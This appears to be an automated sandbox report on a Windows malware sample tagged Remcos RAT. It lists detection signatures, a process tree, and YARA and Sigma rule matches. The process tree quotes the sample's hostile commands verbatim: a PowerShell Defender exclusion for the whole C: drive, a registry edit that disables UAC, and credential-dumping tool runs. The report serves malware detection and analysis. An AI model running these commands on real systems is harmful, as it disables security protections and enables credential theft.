Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report xxTzyGLZx5.exe

Overview

General Information

Sample Name:xxTzyGLZx5.exe
Analysis ID:535501
MD5:d5f570694f0847caea18ccac8837b052
SHA1:b509737bb61ae0e9dee56ca2706456b3788ce553
SHA256:ea209f6ba95920038ac83985be8bcffc1fda49631ed3142cfdd9f2acd52584b1
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos AgentTesla AveMaria HawkEye MailPassView SpyEx UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Yara detected AgentTesla
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Yara detected SpyEx stealer
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Sigma detected: Suspicious Script Execution From Temp Folder
Connects to many ports of the same IP (likely port scanning)
Uses cmd line tools excessively to alter registry or file data
Contains functionality to steal Firefox passwords or cookies
Writes or reads registry keys via WMI
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Sigma detected: WScript or CScript Dropper
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Installs a global keyboard hook
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Increases the number of concurrent connection per server for Internet Explorer
.NET source code references suspicious native API functions
Delayed program exit found
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Hides user accounts
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Contains functionality to steal Chrome passwords or cookies
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
Spawns drivers
PE file contains more sections than normal
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • xxTzyGLZx5.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\xxTzyGLZx5.exe" MD5: D5F570694F0847CAEA18CCAC8837B052)
    • xxTzyGLZx5.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\xxTzyGLZx5.exe" MD5: D5F570694F0847CAEA18CCAC8837B052)
      • bin.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\bin.exe" 0 MD5: 805FBB84293E86F25B566A5B2C2815D2)
        • powershell.exe (PID: 6324 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5984 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rem9090sta.exe (PID: 7136 cmdline: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0 MD5: 083D4CDE33E6721F595A468BB7D17ADA)
        • cmd.exe (PID: 7156 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6204 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • wscript.exe (PID: 3740 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6620 cmdline: C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • remcos.exe (PID: 3228 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 083D4CDE33E6721F595A468BB7D17ADA)
  • remcos.exe (PID: 4200 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • cmd.exe (PID: 6076 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 7092 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • remcos.exe (PID: 3228 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • remcos.exe (PID: 7100 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • remcos.exe (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • dwn.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Roaming\Remcos\dwn.exe" MD5: 32EB10C12A29B38F13730CD1F5DCAD4D)
      • 21.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\21.exe" 0 MD5: 6C9447A6F1B04C75D95594338AE61E06)
        • 21.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\Temp\21.exe" 0 MD5: 6C9447A6F1B04C75D95594338AE61E06)
      • 5.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Local\Temp\5.exe" 0 MD5: 3F332B62EEE0970F3189C689D5BD042A)
        • 5.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\5.exe" 0 MD5: 3F332B62EEE0970F3189C689D5BD042A)
          • Windows Update.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
            • Windows Update.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
              • dw20.exe (PID: 5276 cmdline: dw20.exe -x -s 2132 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
              • vbc.exe (PID: 980 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
              • vbc.exe (PID: 2932 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • 4.exe (PID: 6140 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" 0 MD5: 78EDE0254C66FA9E667E4CEB88754E1C)
        • 4.exe (PID: 1260 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" 0 MD5: 78EDE0254C66FA9E667E4CEB88754E1C)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • bin.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\bin.exe" MD5: 805FBB84293E86F25B566A5B2C2815D2)
  • remcos.exe (PID: 6416 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\bin.exeCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\bin.exeCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x191f0:$c1: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\bin.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x144e8:$a1: \Opera Software\Opera Stable\Login Data
  • 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Temp\bin.exeJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    C:\Users\user\AppData\Local\Temp\bin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Click to see the 6 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000030.00000000.890118500.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 250 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                40.1.5.exe.41ce65.1.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                  2.2.xxTzyGLZx5.exe.4031bf.1.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
                  • 0x17ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                  2.2.xxTzyGLZx5.exe.4031bf.1.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                  • 0x17ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                  • 0x17ff0:$c1: Elevation:Administrator!new:
                  2.2.xxTzyGLZx5.exe.4031bf.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x138e8:$a1: \Opera Software\Opera Stable\Login Data
                  • 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
                  2.2.xxTzyGLZx5.exe.4031bf.1.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
                    Click to see the 553 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Script Execution From Temp FolderShow sources
                    Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, ParentProcessId: 7136, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 3740
                    Sigma detected: WScript or CScript DropperShow sources
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, ParentProcessId: 7136, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 3740
                    Sigma detected: Powershell Defender ExclusionShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\bin.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\bin.exe, ParentProcessId: 7116, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 6324
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\bin.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\bin.exe, ParentProcessId: 7116, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 6324
                    Sigma detected: Group Modification LoggingShow sources
                    Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132833543238841154.6324.DefaultAppDomain.powershell

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeAvira: detection malicious, Label: TR/Redcap.ghjpt
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: xxTzyGLZx5.exeVirustotal: Detection: 30%Perma Link
                    Yara detected Remcos RATShow sources
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rem9090sta.exe PID: 7136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
                    Yara detected AveMaria stealerShow sources
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 25%Perma Link
                    Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 46%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeReversingLabs: Detection: 75%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\4.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\5.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                    Source: 35.2.dwn.exe.5af305.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 40.0.5.exe.400000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.0.5.exe.400000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 3.0.bin.exe.d0000.0.unpackAvira: Label: TR/Redcap.ghjpt
                    Source: 44.0.Windows Update.exe.415058.14.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 40.1.5.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 40.1.5.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 43.2.Windows Update.exe.147b1458.3.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 39.0.21.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
                    Source: 44.2.Windows Update.exe.400000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
